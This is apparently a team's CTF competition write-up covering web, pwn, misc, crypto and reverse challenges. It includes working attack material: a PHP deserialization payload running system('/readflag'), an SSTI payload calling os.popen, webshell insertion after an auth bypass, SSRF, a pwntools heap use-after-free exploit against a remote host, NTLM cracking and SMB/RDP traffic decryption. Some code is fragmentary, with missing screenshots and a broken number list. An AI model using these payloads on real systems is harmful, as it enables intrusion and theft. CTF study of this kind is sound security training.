Team name: ZeroPointZero
Team rank: 63rd
PART.01
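Steps:
Download the attachment and audit the source code
Iterate over the blacklist to check the input
Process the module data that is passed in
Convert the JSON-format data into Python code
The code produced this way is executed by adding it to hook_code:
Root route
Exploitation idea:
Malicious code is passed in through the module and then concatenated into hook_code, where it is executed.
Exploitation conditions:
1. During the iteration, bypass check_for_blacklisted_symbols for the test module. The else branch calls unidecode.unidecode to decode the contents of text,
and dynamic debugging showed that fullwidth characters bypass the blacklist directly.
Blacklist bypassed successfully.
2. The code that passed the blacklist is concatenated into hook_code, but our code is passed in as event_name, and len is used to check whether the length is greater than 4, which has to be bypassed. The idea: len belongs to the builtins module, which contains all of Python's built-in functions, including len. First import it with __import__("builtins"), then use .len = lambda qwe: 1 to rebind len to a new anonymous function (a lambda expression) that takes one parameter qwe and always returns 1, whatever argument is passed.
From an article we consulted:
It turns out this directly changes the return value of the len function.
The greater-than-4 condition is bypassed successfully.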
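1. Read the file with cat, cat /flag, using octal encoding and $() Linux inline command execution. cat could not read it, not sure why, so I switched to dd, dd if=/flag, as follows
Local dynamic debugging run:
Via the website:
Online fullwidth/halfwidth converter
https://www./string/full-half-width-converter
Blacklist bypassed successfully:
Execution enters the unidecode.unidecode logic, which processes the data,
the malicious code is recovered correctly and returned,
appended to the empty string python_code,
and passed into the do function, where the concatenation produces
Then the my_audit_hook code is written to run.py and executed with python:
and the result is returned.
Local dynamic debugging: bypass and execution succeeded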
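The two checks that fail in this challenge, next to hardened forms, as an added example that is not the challenge's own code. Assumptions: the blacklist contents are hypothetical, unicodedata NFKC folding stands in for unidecode.unidecode, and the hook functions only model the "length greater than 4" test described above.

```python
import builtins
import unicodedata

# Hypothetical blacklist; the challenge's real list is not shown in the write-up.
BLACKLIST = ("import", "open", "eval", "exec", "__")


def fold(text):
    """Stand-in for unidecode.unidecode: NFKC maps fullwidth forms to ASCII."""
    return unicodedata.normalize("NFKC", text)


def has_blacklisted(text):
    return any(symbol in text for symbol in BLACKLIST)


def accept_check_then_fold(text):
    """Order described above: filter the raw text, then fold it."""
    if has_blacklisted(text):
        return None
    return fold(text)


def accept_fold_then_check(text):
    """Hardened order: fold first, then filter exactly what will be executed."""
    folded = fold(text)
    if has_blacklisted(folded):
        return None
    return folded


def to_fullwidth(text):
    """Build a constructed test input: printable ASCII -> fullwidth forms."""
    return "".join(chr(ord(c) + 0xFEE0) if "!" <= c <= "~" else c for c in text)


def hook_global_len(event_name):
    """Resolves len at call time, so rebinding builtins.len changes the verdict."""
    return len(event_name) > 4


_LEN = len  # captured once, when the module is loaded


def hook_pinned_len(event_name):
    """Uses the reference captured at load time, not the current builtins.len."""
    return _LEN(event_name) > 4


def verdicts_after_rebinding(event_name):
    """Rebind builtins.len as the write-up does, query both hooks, then restore."""
    original = builtins.len
    builtins.len = lambda _obj: 1
    try:
        return hook_global_len(event_name), hook_pinned_len(event_name)
    finally:
        builtins.len = original


if __name__ == "__main__":
    sample = to_fullwidth("import") + " math"  # constructed, harmless input
    print(repr(accept_check_then_fold(sample)))
    print(repr(accept_fold_then_check(sample)))
    print(verdicts_after_rebinding("os.system"))
```

Pinning only removes the dependence on builtins.len; code that already runs inside the same interpreter can reach other state, so filtering the folded text is the fix that matters.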
Flag value:
flag{7c1a4fe8981e295a785a49146340b9}
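Directory scanning found the source code at http://eci-2zeikei7c3gbm1zmc0w4.cloudeci1./www.zip
Found class.php, a class file; clearly a deserialization challenge. Looking at the class file we find
This part replaces strings. The SessionManager class operates on the session file
Here the contents of the session file are replaced
Looking at index.php, this is where the class is called (the session stores a random key, so escaping through username is not really controllable)
Pass an array in the password field for the deserialization escape. A simple exp (the lengths can actually be counted by hand):
';i:1;s:74:' 12 passthrueval {i:0;s:6:'123456';i:1;s:3:'123';} ';i:1;s:3:'123';}t|O:15:'notouchitsclass':1:{s:4:'data';s:20:'syssystemtem('/readflag');';}
system is written twice to get past the replacement
<?php
class notouchitsclass
{
    // "system" is doubled so that one copy survives the string replacement
    public $data = "syssystemtem('/readflag');";
}
echo serialize(new notouchitsclass());
Modify the length in the serialized data
Flag value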
flag{d572d3d9-84d7-4428-b0a7-4bb0a07bf246}
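Initialize the challenge environment:
Downloaded a copy of the source code from GitHub for analysis
Looked around for n-days and found nothing, so I turned to the source code and found a very suspicious spot
The Admins class only inherits methods and never calls the initialize authentication code, so I guessed the admin backend might be reachable without authorization; visiting /admin/admins/ got into the backend
Browsing around, Payment Settings under Payment Management turned out to be a web page that edits a PHP file, so that is the way in: insert a one-line webshell directly. It behaved differently than expected because the code contains a return, so I deleted everything and inserted the one-liner:
Save and refresh
Flag value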
Flag{e6f9ee8b-483a-9eae-62b7deda41dd}
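Download the attachment and audit the source code:
A request struct is defined to carry the JSON data
/v1/api/flag runs flag and returns JSON
The absolute path of the URL is checked
Construct a request using the struct above
Direct access returns 403. Going by the challenge hint (proxy) and the code,
/v2/api/proxy turns this struct into a new request, which opens an SSRF vulnerability:
Access it with HackBar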
flag{43f4a8ab-9bf0-4598-bd65-a169dcb0620f}
PART.05
WEB4-snake
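Analysing the JSON returned by the backend shows a Snake game on a two-dimensional array; a script can simulate and plot the backend positions of the snake, the food and the walls:
Code: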
import time
import requests
import json

api_url = 'url/move'  # url
http_headers = {
    'Cookie': 'session='  # session
}
request_payload = {'direction': 'RIGHT'}
proxy = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}


def safe_path(snake_segments, target_position):
    # True if the target cell is not occupied by the snake's body
    return target_position not in snake_segments


def bounds(target_position):
    # True if the target cell lies inside the 20x20 board
    if target_position[0] > 19 or target_position[0] < 0 or target_position[1] > 19 or target_position[1] < 0:
        return False
    return True


game_state = ''
while True:
    try:
        game_state = requests.post(api_url, json=request_payload,
                                   headers=http_headers, proxies=proxy)
        game_state = game_state.json()
        print(game_state)
        snake_ld = game_state['snake'][0]  # head of the snake
        target_food = game_state['food']
        move_dir = ''
        # First try to move toward the food, then fall back to any free cell
        if target_food[0] > snake_ld[0] and safe_path(game_state['snake'], [snake_ld[0] + 1, snake_ld[1]]) \
                and bounds([snake_ld[0] + 1, snake_ld[1]]):
            move_dir = 'RIGHT'
        elif target_food[0] < snake_ld[0] and safe_path(game_state['snake'], [snake_ld[0] - 1, snake_ld[1]]) \
                and bounds([snake_ld[0] - 1, snake_ld[1]]):
            move_dir = 'LEFT'
        elif target_food[1] > snake_ld[1] and safe_path(game_state['snake'], [snake_ld[0], snake_ld[1] + 1]) \
                and bounds([snake_ld[0], snake_ld[1] + 1]):
            move_dir = 'DOWN'
        elif target_food[1] < snake_ld[1] and safe_path(game_state['snake'], [snake_ld[0], snake_ld[1] - 1]) \
                and bounds([snake_ld[0], snake_ld[1] - 1]):
            move_dir = 'UP'
        elif safe_path(game_state['snake'], [snake_ld[0] + 1, snake_ld[1]]) and bounds([snake_ld[0] + 1, snake_ld[1]]):
            move_dir = 'RIGHT'
        elif safe_path(game_state['snake'], [snake_ld[0] - 1, snake_ld[1]]) and bounds([snake_ld[0] - 1, snake_ld[1]]):
            move_dir = 'LEFT'
        elif safe_path(game_state['snake'], [snake_ld[0], snake_ld[1] + 1]) and bounds([snake_ld[0], snake_ld[1] + 1]):
            move_dir = 'DOWN'
        elif safe_path(game_state['snake'], [snake_ld[0], snake_ld[1] - 1]) and bounds([snake_ld[0], snake_ld[1] - 1]):
            move_dir = 'UP'
        if move_dir == '':
            continue
        request_payload = {'direction': move_dir}
        print(request_payload)
    except Exception as err:
        pass
Watch the score in Burp; at a score of around 40 the path /snake_win shows up
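SQL injection was also carried out and everything in the database was dumped (there are only the sqlite_sequence and users tables) without the flag turning up
We then changed approach and narrowed the problem down: username in the users table appeared to be the value we entered at the start,
and querying username from the users table confirmed that SSTI template injection is executed,
so a payload obtained online was put in
{{lipsum.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")}}
Entering characters such as '{{}}"" in the username field made the page return a 500 error, which revealed a Python framework; on the snake_win route it turned out that SQL statements could be executed

A similar case had been shared within the team before: SQL statement + SSTI to get a shell directly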
WEB7-gamepassword
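Register a game user named xxx
Then start playing the game in the password field
Cleared level 2
Just beat the game to obtain the source code
Got it
At this step it satisfies that r2, then compute the addition 41233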
password=O:4:'root':3: {s:8:'username';s:3:'xxx';s:5:'value';i:2024;s:2:'kk';O:4:'user':3: {s:8:'username';R:3;s:8:'password';N;s:5:'value';s:5:'99933';}}96 exp
<?php
class root {
    public $username;
    public $value;
    public $kk;
}
class user {
    public $username;
    public $password;
    public $value;
}
// Create the root and user objects
$root = new root();
$root->username = 'xxx';
$root->value = 2024;
// Create the user object
$user = new user();
$user->username = &$root->username; // reference to username in the root object
$user->password = null;
$user->value = '99933';
$root->kk = $user;
// Serialize the object
$serializedData = serialize($root);
echo $serializedData;
?>
Flag value:
flag{f9ebc0ee-ca8c-4c47-a0e6-8b020ad9b88b}
PWN5 baby_heap
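Chunks are in the largebin size range, so there is no need to fill the tcache bins; at most 5 chunks can be held at once
free has a UAF
show is not truncated, so libc_base and heap_base can be leaked at the same time, although that ended up not being used
print_env calls getenv, and getenv is implemented with strncmp
so overwriting the GOT entry of strncmp with puts is enough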
from pwn import *
from pwncli import *
from struct import pack
from ctypes import *

elf_name = './baby_heap'
# io = process(elf_name)
io = remote('39.106.54.211', 26641)
# context(os='linux', arch='amd64')
# context(os='linux', arch='amd64', log_level='debug')
elf = ELF(elf_name)
libc = ELF('./libc-2.35.so')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# libc = ELF('/home/yukon/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6')  # ctfshow uses ubuntu18.04

# Short aliases for the usual send/receive helpers
lg_infos = []
lga = lambda data: lg_infos.append(data)
s = lambda data: io.send(data)
sl = lambda data: io.sendline(data)
sa = lambda text, data: io.sendafter(text, data)
sla = lambda text, data: io.sendlineafter(text, data)
r = lambda n: io.recv(n)
ru = lambda text: io.recvuntil(text)
rl = lambda: io.recvline()
int16 = lambda a: int(a, 16)
strencode = lambda a: str(a).encode()
uu32 = lambda: u32(io.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
uu64 = lambda: u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
iuu32 = lambda: int(io.recv(10), 16)
iuu64 = lambda: int(io.recv(6), 16)
uheap = lambda: u64(io.recv(6).ljust(8, b'\x00'))
# lg = lambda addr: log.success(addr)
# lg = lambda addr: log.info(addr)
lg = lambda data: io.success('%s -> 0x%x' % (data, eval(str(data))))
ia = lambda: io.interactive()


def log_all():
    for lg_info in lg_infos:
        lg(lg_info)


def attach(io, gdbscript=''):
    log_all()
    gdb.attach(io, gdbscript)


def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))


def get_IO_str_jumps():
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            print(possible_IO_str_jumps_offset)
            return possible_IO_str_jumps_offset


menu = b'Enter your choice: \n'


def add(size):
    sla(menu, b'1')
    sla(b'Enter your commodity size \n', strencode(size))


def delete(idx):
    sla(menu, b'2')
    sla(b'Enter which to delete: \n', strencode(idx))


def edit(idx, content):
    sla(menu, b'3')
    sla(b'Enter which to edit: \n', strencode(idx))
    sla(b'Input the content \n', content)


def show(idx):
    sla(menu, b'4')
    sla(b'Enter which to show: \n', strencode(idx))


def g():
    gdb_sript = '''set debug-file-directory /home/yukon/glibc-all-in-one/libs/2.35-0ubuntu3.7_amd64/.debug
file %s
sharedlibrary
file
sharedlibrary
tele $rebase(0x5070) 1
tele $rebase(0x5080) 5
tele $rebase(0x50e0) 5
''' % elf_name
    # gdb.attach(io)
    # gdb.attach(io, 'b printf')
    gdb.attach(io, gdb_sript)
    log_all()


# Free a largebin-sized chunk and read it back through the UAF to leak libc
add(0x500)
add(0x10)
delete(1)
show(1)
libc_base_addr = uu64() - 0x21ace0
strncmp_got = libc_base_addr + 0x00000000021A118
# Overwrite the strncmp GOT entry (this script writes the address of printf)
sla(': ', '0')
s(p64(strncmp_got))
s(p64(libc_base_addr+libc.symbols['printf']))
# Trigger print_env so that getenv calls the overwritten entry
sla(b': ', b'5')
sl(b'2')
ru(b'FLAG')
print('FLAG:------------------------------', end='')
print(rl())
# delete(2)
# g()
ia()
# io.recvuntil('(.*?)')
# io.recvuntil(b'$1')
# io.sendline(str((.*?)))
# io.sendline(str($1).encode())
flag{cfdc2518-0b1e-4df3-a781-7bef484b7c37}
Misc1-pickle_jail
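Download the attachment and look at the py file, which is the server-side code. It is a jail that uses the pickle module to serialize and deserialize data: the user's name, the player list and the flag are serialized into a BytesIO object, and the serialized data is converted to a byte array. To modify the data, the user is asked to enter a random number, and the value at the corresponding position in the byte array is then changed
Write a brute-force EXP according to these rules and brute-force byte by byte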
from pwn import *
import struct
import re

ip = ''
port = 0  # left blank in the write-up; set to the challenge port
CHARACTER_SET = '0123456789abcdef-'
CURRENT_FLAG = 'flag{'


def establish_connection():
    return remote(ip, port)


def retrieve_player_count(connection):
    '''Retrieve the player count from the service'''
    players_info = connection.recvuntil(b"What's your name?\n")
    player_data = re.findall(rb'\[(.*)\]', players_info)
    return 289 - (len(player_data[0]) - 248) if player_data else 289


def construct_payload(attempted_flag, player_count):
    '''Build the payload'''
    name_length = struct.pack('<I', len(attempted_flag))
    # A newline byte in the packed length would end the line early, so drop one character
    if b'\n' in name_length:
        attempted_flag = attempted_flag[1:]
        name_length = struct.pack('<I', len(attempted_flag))
    padding_length = struct.pack('<I', 600 - len(attempted_flag) - player_count)
    prefix = b'B\x7f\x00\x00\x00'
    suffix = b'(B' + name_length + attempted_flag.encode() + b'B' + padding_length
    payload = prefix + b'\x00' * 127 + suffix + b'\x00' * (254 - len(prefix) - 127 - len(suffix))
    return payload


def verify_flag_response(response, attempted_flag):
    '''Check whether the response contains the attempted flag'''
    if attempted_flag.encode() in response:
        if attempted_flag[0] != 'f':
            return 'f' + attempted_flag
        else:
            return attempted_flag
    return None


def main():
    global CURRENT_FLAG  # the guess is extended in place as characters are confirmed
    while True:
        for char in CHARACTER_SET:
            with establish_connection() as conn:
                player_count = retrieve_player_count(conn)
                attempted_flag = CURRENT_FLAG + char
                print(f'Attempting flag: {attempted_flag}')
                payload = construct_payload(attempted_flag, player_count)
                conn.sendline(payload)
                conn.recvuntil(b'Enter a random number to win: \n')
                conn.sendline(b'\x0c')
                response = conn.recvline()
                print(f'Server response: {response}')
                updated_flag = verify_flag_response(response, attempted_flag)
                if updated_flag:
                    CURRENT_FLAG = updated_flag
                    print(f'Updated flag: {CURRENT_FLAG}')
                    break


if __name__ == '__main__':
    main()
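At the end of the brute force the last position repeats endlessly and never stops, which shows that the charset has no matching value, so this position must be }; finally submit the flag
Flag value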
flag{9856e5e7-2703-47f4-8328-e6761a40834d}
PART.02
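Just trick it
Image 1:
Been there: Qinghai Lake. A walk along the shore in Baidu panorama finds it
At this location
Image 2:
Baidu search; it is in Shanghai
Image 3:
Based on this and the control tower, located Shuangliu Airport
Image 5:
A giveaway: Chongqing light rail
Image 6:
Based on this, found the Glazed Pagoda of the Great Bao'en Temple in Nanjing
Image 7:
Analysis with GPT:
Chose Changsha; from the image it is easy to see that it was taken on a bridge with an island beneath it
Opened Changsha's ring-road bridges one by one and finally located it at Juzizhou (Orange Isle)
Image 8:
Searched Baidu Maps for the Shanghai tunnel-bridge; recognisable at a glance
So the flat area on the left is actually the sea?
Image 9:
Looks like the Anqing Yangtze River Bridge, but the guardrail is blue; searched Baidu for Yangtze River bridges
No panorama available; tried a few bridges and got it right, can't remember whether it was Zhuankou
Image 10:
Zhejiang. Found this: 中铁三局 (China Railway No. 3 Engineering Group),
looked at several areas dense with high-speed rail and finally found it in Hangzhou
Flag value: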
flag{b686da73592624ad0f92633fcab6ec0e}
MISC8-谍影重重5.0:
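Analysing the conversations: A: 00:0c:29:67:dc:36 and B: 00:50:56:f2:25:de are talking to each other
There is an SMB2 packet here followed by a User; looking closely,
use this id and key to decrypt the SMB traffic
Nothing changed, decryption failed; searched online for material
Try this
Build the hashcat format
Only tom logged in successfully,
so it is
tom::.:c1dec53240124487:ca32f9b5b48c04ccfa96f35213d63d75:
Crack the hash with john
Next, compute the SMB random session key from the recovered password (using the py script from the article above)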
import hashlib
import hmac
import argparse

# stolen from impacket. Thank you all for your wonderful contributions to the community
# try:
from Cryptodome.Cipher import ARC4
from Cryptodome.Cipher import DES
from Cryptodome.Hash import MD4
# except Exception:
#     LOG.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
#     LOG.critical("See https:///project/pycryptodomex/")


def generateEncryptedSessionKey(keyExchangeKey, exportedSessionKey):
    cipher = ARC4.new(keyExchangeKey)
    cipher_encrypt = cipher.encrypt
    sessionKey = cipher_encrypt(exportedSessionKey)
    return sessionKey

###

parser = argparse.ArgumentParser(description='Calculate the Random Session Key based on data from a PCAP (maybe).')
parser.add_argument('-u', '--user', required=True, help='User name')
parser.add_argument('-d', '--domain', required=True, help='Domain name')
parser.add_argument('-p', '--password', required=True, help='Password of User')
parser.add_argument('-n', '--ntproofstr', required=True, help='NTProofStr. This can be found in PCAP (provide Hex Stream)')
parser.add_argument('-k', '--key', required=True, help='Encrypted Session Key. This can be found in PCAP (provide Hex Stream)')
parser.add_argument('-v', '--verbose', action='store_true', help='increase output verbosity')
args = parser.parse_args()

# Upper Case User and Domain
user = str(args.user).upper().encode('utf-16le')
domain = str(args.domain).upper().encode('utf-16le')

# Create 'NTLM' Hash of password
# (MD4 from Cryptodome; hashlib's md4 depends on the OpenSSL build)
passw = args.password.encode('utf-16le')
hash1 = MD4.new(passw)
password = hash1.digest()

# Calculate the ResponseNTKey
h = hmac.new(password, digestmod=hashlib.md5)
h.update(user + domain)
respNTKey = h.digest()

# Use NTProofSTR and ResponseNTKey to calculate Key Exchange Key
NTproofStr = bytes.fromhex(args.ntproofstr)
h = hmac.new(respNTKey, digestmod=hashlib.md5)
h.update(NTproofStr)
KeyExchKey = h.digest()

# Calculate the Random Session Key by decrypting Encrypted Session Key with Key Exchange Key via RC4
RsessKey = generateEncryptedSessionKey(KeyExchKey, bytes.fromhex(args.key))

if args.verbose:
    print('USER WORK: ' + (user + domain).decode('utf-16le'))
    print('PASS HASH: ' + password.hex())
    print('RESP NT: ' + respNTKey.hex())
    print('NT PROOF: ' + NTproofStr.hex())
    print('KeyExKey: ' + KeyExchKey.hex())
print('Random SK: ' + RsessKey.hex())
NTProofSTR and key:
python calc.hash.py --user tom --domain . --password babygirl233 --ntproofstr ca32f9b5b48c04ccfa96f35213d63d75 --key 5643a37f253b00b2f52df1afd48c1514
This gives the session key
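Decrypt SMB2,
export the SMB objects and find an archive
The archive needs a password
Besides the archive, the capture also contains RDP traffic
Searching turns up
Export the certificate as a pfx; the certificate was exported by mimikatz and its password is mimikatz
openssl pkcs12 -in 2.pfx -nocerts -out server_key.pem -nodes
openssl rsa -in server_key.pem -out server.key
The RDP traffic is now in plaintext; filter it
Reconstruct the RDP traffic
Play the reconstructed video with pyrdp-player and watch the keyboard input below
the 7z password is f'{windows_password}9347013182'
Substituting the Windows password gives the 7z extraction password babygirl2339347013182,
which is the password of the archive
Flag value: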
flag{fa32a0b2-dc26-41f9-a5cc-1a48ca7b2ddd}
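Steps:
Analyse the script
Input matched against a regular expression: the program accepts a command and uses the regular expression
pattern = r'([AB]|\d+)=([AB]|\d+)(\+|\-|\*|//|<<|>>|&|\^|%)([AB]|\d+)'
to check the command format, which must have the form X=Y OP Z.
Step limit: the program limits the number of operations to 21 in total; the counter starts at 21.
Hamming weight: a function w is defined that computes the Hamming weight of its input, that is, the number of 1 bits in the binary representation.
Random values and counting: the program randomly generates 100 different values of A (128-bit integers) and runs the computation on each. When the success counter reaches 100, the flag is released.
Bit operations: the computation has to adjust the value of A with bitwise AND, right shifts and additions.
Hence the exp:
B=A>>1;B=B&113427455640312821154458202477256070485;A=A-B;B=A&68056473384187692692674921486353642291;A=A>>2;A=A&68056473384187692692674921486353642291;A=A+B;B=A>>4;A=A+B;A=A&20016609818878733144904388672456953615;B=A>>8;A=A+B;B=A>>16;A=A+B;B=A>>32;A=A+B;B=A>>64;A=A+B;A=A&1
Flag{you_can_weight_it_in_21_steps!}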
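A small interpreter for the X=Y OP Z command language, used to run the first 18 commands of the exp above against Python's own bit count, as an added example that is not the challenge's server code. Assumptions: commands are matched with fullmatch, B starts at 0, malformed commands raise ValueError, and the result is read from the low byte of A in Python rather than through a final masking command.

```python
import random
import re

# Command grammar from the write-up (X=Y OP Z), with the regex escapes restored.
PATTERN = re.compile(r'([AB]|\d+)=([AB]|\d+)(\+|\-|\*|//|<<|>>|&|\^|%)([AB]|\d+)')

OPS = {
    '+': lambda x, y: x + y,
    '-': lambda x, y: x - y,
    '*': lambda x, y: x * y,
    '//': lambda x, y: x // y,
    '<<': lambda x, y: x << y,
    '>>': lambda x, y: x >> y,
    '&': lambda x, y: x & y,
    '^': lambda x, y: x ^ y,
    '%': lambda x, y: x % y,
}

# Decimal masks copied from the exp: 0x5555..., 0x3333... and 0x0f0f... over 128 bits.
MASK_PAIRS = 113427455640312821154458202477256070485
MASK_NIBBLES = 68056473384187692692674921486353642291
MASK_BYTES = 20016609818878733144904388672456953615

# The first 18 commands of the exp.
SEQUENCE = (
    f"B=A>>1;B=B&{MASK_PAIRS};A=A-B;"
    f"B=A&{MASK_NIBBLES};A=A>>2;A=A&{MASK_NIBBLES};A=A+B;"
    f"B=A>>4;A=A+B;A=A&{MASK_BYTES};"
    "B=A>>8;A=A+B;B=A>>16;A=A+B;B=A>>32;A=A+B;B=A>>64;A=A+B"
)


def run(commands, a, b=0, limit=21):
    """Execute ';'-separated commands on registers A and B; return (A, steps)."""
    regs = {'A': a, 'B': b}
    steps = [c for c in commands.split(';') if c]
    if len(steps) > limit:
        raise ValueError(f'{len(steps)} steps exceed the limit of {limit}')
    for cmd in steps:
        match = PATTERN.fullmatch(cmd)
        if match is None:
            raise ValueError(f'malformed command: {cmd!r}')
        dst, lhs, op, rhs = match.groups()
        if dst not in regs:
            raise ValueError(f'cannot assign to {dst!r}')
        operand = lambda tok: regs[tok] if tok in regs else int(tok)
        regs[dst] = OPS[op](operand(lhs), operand(rhs))
    return regs['A'], len(steps)


def weight_via_sequence(a):
    """Hamming weight of a 128-bit value: low byte of A after the 18 steps."""
    result, _ = run(SEQUENCE, a)
    return result & 0xFF


def check(samples=100, seed=0):
    """Compare against bin().count('1') on edge cases and constructed random values."""
    rng = random.Random(seed)
    values = [0, 1, 2**128 - 1] + [rng.getrandbits(128) for _ in range(samples)]
    return all(weight_via_sequence(v) == bin(v).count('1') for v in values)


if __name__ == '__main__':
    print(check(), run(SEQUENCE, 5)[1])
```

The byte-wise sums never exceed 128, so no carry crosses a byte boundary and the low byte holds the full weight.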
Steps:
There is a similar challenge online:
huwangbei2019_Crypto1 – f61d
Reuse the EXP from the link: get the required values over nc, fill them in, run the script and wait a while
# encoding: utf-8
from Crypto.Util.number import bytes_to_long, long_to_bytes
from gmpy2 import mpz, iroot, powmod, invert

# N = pq 2050bit; p 1025 bit; q 1025 bit
N = mpz('')  # fill in the value received over nc
# g 500bit; is p-1 and q-1 prime factor
# p = 2*g*a + 1; q = 2*g*b + 1
g = mpz('')  # fill in the value received over nc
e = 65537
C = mpz('')  # fill in the value received over nc

# Calculate h, u, and v
h = (N - 1) // g
u = h // g
v = h % g


def Solve_c(start_r=5100, start_s=2000):
    # Calculate approximate square root of N
    sqrt_N = iroot(mpz(N), 2)[0]
    C_approx = sqrt_N // (g * g)  # make sure the result is an integer
    a = 2
    b = powmod(a, g, N)
    # Loop over possible values of C
    for i in range(2, int(C_approx) + 1):  # int() converts C_approx to an integer
        D = (iroot(C_approx, 2)[0] + 1) * i
        final = powmod(b, u, N)
        for r in range(5100, int(D)):
            print(f'Checking r*D for i={i}: {r * D}')
            for s in range(2000, int(D)):
                if powmod(b, r * D + s, N) == final:
                    print('Solution found: r =', r, 's =', s, 'i =', i)
                    return r * D + s


# Get the value of c
c = Solve_c()
print('c:', c)  # Expected output: c = 51589121
Steps:
part1 gives p+q.
phi = (p-1)*(q-1)
= p*q - (p+q) + 1
= n - (p+q) + 1
Simple RSA
For part2, a write-up of a similar challenge was found
apbq-rsa-ii – DUCTF 2023 – Connor M (connor-mccartney.github.io)
part3 can be solved using the d from 2
EXP
from Crypto.Util.number import *
from gmpy2 import *
from sympy import Matrix
from itertools import *

# part1: hints is p + q, so phi = n - (p + q) + 1
hints = 18978581186415161964839647137704633944599150543420658500585655372831779670338724440572792208984183863860898382564328183868786589851370156024615630835636170
n1, e1 = (89839084450618055007900277736741312641844770591346432583302975236097465068572445589385798822593889266430563039645335037061240101688433078717811590377686465973797658355984717210228739793741484666628342039127345855467748247485016133560729063901396973783754780048949709195334690395217112330585431653872523325589, 65537)
enc1 = 23664702267463524872340419776983638860234156620934868573173546937679196743146691156369928738109129704387312263842088573122121751421709842579634121187349747424486233111885687289480494785285701709040663052248336541918235910988178207506008430080621354232140617853327942136965075461701008744432418773880574136247
phi1 = n1 - hints + 1
d1 = inverse(e1, phi1)
m1 = pow(enc1, d1, n1)
flag1 = long_to_bytes(m1).decode()
7867343343213411600516855009788294067588153504026267213013591793027,22369607314724468760253123915374991621544992437057652340350735935680183705467064876346663859696919167243522648029531700630202188671406298533187087292461774927340821192866797400987231509211718089237481902671100,16994227117141934754898145294760231694287000959561775153135582047697469327393472840046006353260694322888486978811557952926229613247229990658445756595259401269267528233642142950389040647504583683489067768144570,21758885458682118428357134100118546351270408335845311063139309657532131159530485845186953650675925931634290182806173575543561250369768935902929861898597396621656214490429009706989779345367262758413050071213624,20156282616031755826700336845313823798147854495428660743884481573484471099887576514309769978525225369254700468742981099548840277532978306665910844928986235042420698332201264764734685502001234369189521332392642,23291765247744127414491614915358658114280269483384022733002965612273627987872443453777028006606037159079637857473229879140366385523633075816362547967658930666106914269093225208138749470566410361196451552322613,19807792217079652175713365065361659318870738952921195173619551645956745050506271953949139230097128034416815169649874760890189515620232505703162831090225715453502422905418824316957257395992121750661389503495033,22074209373194902539215367382758486068533032275912313703269990627206774967653336496619231924013216321042649461711292555464574124714934511202231319963361912937842068483700298097209400217869036338644607607557860,19678336511265998427322297909733474384702243426420286924671444552444079816707773485084891630780465895504253899943221044355971296122774264925882685351095921532685536165514189427245840338009573352081361238596378,24746314790210393213546150322117518542380438001687269872679602687597595933350510598742749840102841364627647151669428936678130556027300886850086220074563664367409218038338623691372433831784916816798993162471163,193461372065128952542023700185551397136902
72833895195472766704715282164091959131850520571672509601848193468792313437642997923790118115476212663296111963644011010744006086847599108492279986468255445160241848708,22739514514055088545643169404630736699361136323546717268615404574809011342622362833245601099992039789664042350284789853188040159950619203242924511038681127008964592137006103547262538912024671048254652547084347,21491512279698208400974501713300096639215882495977078132548631606796810881149011161903684894826752520167909538856354238104288201344211604223297924253960199754326239113862002469224042442018978623149685130901455,19381008151938129775129563507607725859173925946797075261437001349051037306091047611533900186593946739906685481456985573476863123716331923469386565432105662324849798182175616351721533048174745501978394238803081,19965143096260141101824772370858657624912960190922708879345774507598595008331705725441057080530773097285721556537121282837594544143441953208783728710383586054502176671726097169651121269564738513585870857829805]
n=73566307488763122580179867626252642940955298748752818919017828624963832700766915409125057515624347299603944790342215380220728964393071261454143348878369192979087090394858108255421841966688982884778999786076287493231499536762158941790933738200959195185310223268630105090119593363464568858268074382723204344819
e=65537
c =303325902301538095072162987711300589545233321407544419561213050051014340368575924458704998080034922824066586828116710928855922904105703482831223593195541974856247845903155640563419763556155432243733447818138909019162698542426607088151231524406203830357985422758333618201962948143856226136210167718548464912449067773077510925207378520309595658022345214442920360440202890774224295250116442048990578009377300541280465330975931465993745130297479191298485033569345231
import itertools
from Crypto.Util.number import inverse, long_to_bytes

# Build a lattice from the first four hints and reduce it with LLL
V = hints[:4]
k = 2 ^ 800
M = Matrix.column([k * v for v in V]).augment(Matrix.identity(len(V)))
B = [b[1:] for b in M.LLL()]
M = (k * Matrix(B[:len(V) - 2])).T.augment(Matrix.identity(len(V)))
B = [b[-len(V):] for b in M.LLL() if set(b[:len(V) - 2]) == {0}]
# Try small combinations of the two reduced vectors until the gcd with n is non-trivial
for s, t in itertools.product(range(4), repeat=2):
    T = s * B[0] + t * B[1]
    a1, a2, a3, a4 = T
    kq = gcd(a1 * hints[1] - a2 * hints[0], n)
    if 1 < kq < n:
        print('find!', kq, s, t)
        break
# Divide out small factors of kq to leave q
for i in range(2 ** 16, 1, -1):
    if kq % i == 0:
        kq //= i
q = int(kq)
print(q)
q = 9067773077510925207378520309595658022345214442920360440202890774224295250116442048990578009377300541280465330975931465993745130297479191298485033569345231
p = int(n // q)
phi2 = (p - 1) * (q - 1)
d = inverse(e, phi2)
m2 = pow(enc2, d, n)
flag2 = long_to_bytes(m2).decode()
enc3 =17737974772490835017139672507261082238806983528533357501033270577311227414618940490226102450232473366793815933753927943027643033829459416623683596533955075569578787574561297243060958714055785089716571943663350360324047532058597960949979894090400134473940587235634842078030727691627400903239810993936770281755
flag3 = long_to_bytes(pow(enc3, d, n)).decode()
print(flag1 + flag2 + flag3)
Steps:
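This challenge is truly nasty. Debugging mips_bin under qemu yields a fake flag; it passes the check when run under qemu, but it is wrong when run with the provided emu. So the problem must be that the provided emu tampers with the file's instructions.
Set a breakpoint at fork to bypass the process anti-debugging.
In the MIPS instruction set, pc corresponds to ip.
Change ip to
This is where the opcode is assigned.
Next, set a breakpoint where the prompt is printed and see what the final check function actually is.
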